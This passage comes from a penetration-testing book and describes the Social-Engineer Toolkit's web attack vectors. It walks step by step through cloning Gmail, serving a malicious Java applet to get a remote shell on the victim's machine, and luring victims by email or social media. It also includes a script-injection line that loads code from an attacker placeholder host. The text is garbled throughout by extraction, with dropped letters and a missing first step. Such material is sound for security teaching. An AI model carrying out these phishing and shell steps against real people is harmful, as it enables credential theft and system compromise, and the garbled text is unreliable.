The S ocial-Engineer Toolkit (S ET), created by D ave Kennedy, is the world’s premier framework to leverage social engineering a acks to totally compromise systems. The name of the framework actually doesn’t do it justice, as S ET is much more than a spoofed email or malicious PD F creator. I t includes some very advanced functionality that allows exploiting fully patched computers. I t doesn’t ma er what operating system, browser, software, or firewall is installed, S ET’s a acks bypass all of those safeguards. I t’s truly an epic a acking framework that even ties directly into the Metasploit a ack framework. S ET is very easy to use and is included in the latest version of BackTrack. You can get to the S ET directory by executing the cd/pentest/exploits/set command in a terminal window.
You can then run S ET by issuing the ./set command. O nce the framework loads, you will be prompted to agree to the terms of service (select “y” for “yes”) and to allow automatic updates from the GI T repository (select “1” to allow updates). O nce the update is complete, the main SET menu will appear as shown in Figure 6.15.
FIGURE 6.15 Welcome menu for the Social-Engineer Toolkit (SET).
You can download a new version of S ET to any Linux distribution by issuing the following terminal command to check out the latest version.
git clone https://github.com/trustedsec/social-engineer-toolkit/ set
When you select option #1 to get into the social engineering a acks, you have several a ack vectors available to choose from, but you should focus on #2 website a ack vectors for now. There are actually six different a ack vectors available specific to websites that you can select from, and this list grows with every new release of SET!
■ The Java Applet Attack method will spoof a Java Certificate and deliver a Metasploit- based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
■ The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iFrame and deliver a Metasploit payload.
■ The Credential Harvester method will utilize web cloning of a web site that has a username and password field and harvest all the information posted to the website.
■ The TabNabbing method will wait for a user to move to a different tab in their browser, and then refresh the page to something different.
■ The Man Left in the Middle Attack method was introduced by Kos and utilizes the HTTP REFERER header in order to intercept fields and harvest data from them. You need to have an already vulnerable site and incorporate < script src="http://YOURIP/">. This could either be from a compromised site or through XSS.
■ The Web-Jacking Attack method was introduced by white_sheep, Emgent, and the Back|Track team. This method utilizes iFrame replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is
replaced with the malicious link.
■ You can edit the link replacement settings in the set_config if it’s too slow or fast.
There is also the ability to use several of these a ack vectors together with the #7 Multi-A ack Web method. This allows you to chain several of these methods together into a single a ack. For example, you could use the java applet a ack to land a shell on the victim’s machine coupled with the credential harvester to steal the authentication credentials from this same victim when they a empt to login into the spoofed site you’ve created.
I n order for S ET to work properly, you have to set the I P address where S ET will run its web server for the cloned website. This would be the I P address that would be passed to the victim machine. Because we are already running A pache for our D VWA environment, we can’t run S ET at the same time without disabling A pache. S o stopping the A pache service is one option. You can also just start up another VM and run S ET on that (which will be done for this example). This two VM approach will give us a more realistic hacker v. victim feeling to these web user a ack exercises. This is exactly the same thinking that you could have executed the web server hacking steps in Chapter 2.
You have already drilled down into the website a ack vectors menu in S ET by following the steps above, so now it’s time to configure a viable a ack. A ssume the victim machine is at I P address 172.16.69.135 and the a acker machine is at I P address 172.16.69.134. A n outline of se ing up a J ava A pplet a ack via S ET’s menu commands can be completed with the following steps:
2. Choose 2 for Site Cloner
3. Choose “n” for “no” to “Are you suing NAT/Port Forwarding [yes|no]” 4. Provide https://gmail.com for the site to clone
5. Choose 11 for the SE Toolkit Interactive Shell (this is a custom shell similar to Metasploit’s Meterpreter)
6. Provide 443 as the listener port
I f you successfully complete these steps, you will receive a confirmation message that says “The Social-Engineer Toolkit (SET) is listening on 0.0.0.0:443”. The work from the attacker perspective is done!
A ll you need to do now is convince your victim to visit the S ET web server running on 172.16.69.134. This is where the pure social engineering that we discussed earlier comes into play such as email link, instant message, forum post, Facebook post, Twi er, and countless other ways to deliver it.
From the a acker’s perspective, when they visit the I P address (which could also be a snazzy URL if you want to host that) they are met with a website that looks just like Gmail and a prompt to allow a J ava A pplet to be installed and ran. O nce the victim has visited the fake Gmail site and accepted the applet to be installed, a session is opened on the victim’s machine and sent back to the a acker. You will see notification in your S ET terminal and you can issue the sessions -l command (that’s a lowercase L) to see the listing. You can interact with the first session by issuing the sessions -i 1 command (that’s a lowercase I and the #1). You now have a shell prompt on that victim machine and have effectively bypassed any and all defensive countermeasures that may have been installed on it.
A nd that’s it! I t’s that easy! You should dig into more of S ET at the official homepage a t http://www.trustedsec.com/downloads/social-engineer-toolkit/. O ne more tip to remember when using S ET or a empting any social engineering a ack: I t’s pre y much a one-time deal. You don’t get to re-send the email or get a re-do with the potential victim. I a ended a S ET training with D ave Kennedy and we all got a laugh at this notion when we referenced Eminem’s lyrics from Lose Yourself: “You only get one shot, do not miss your chance to blow. This opportunity comes once in a lifetime, yo…”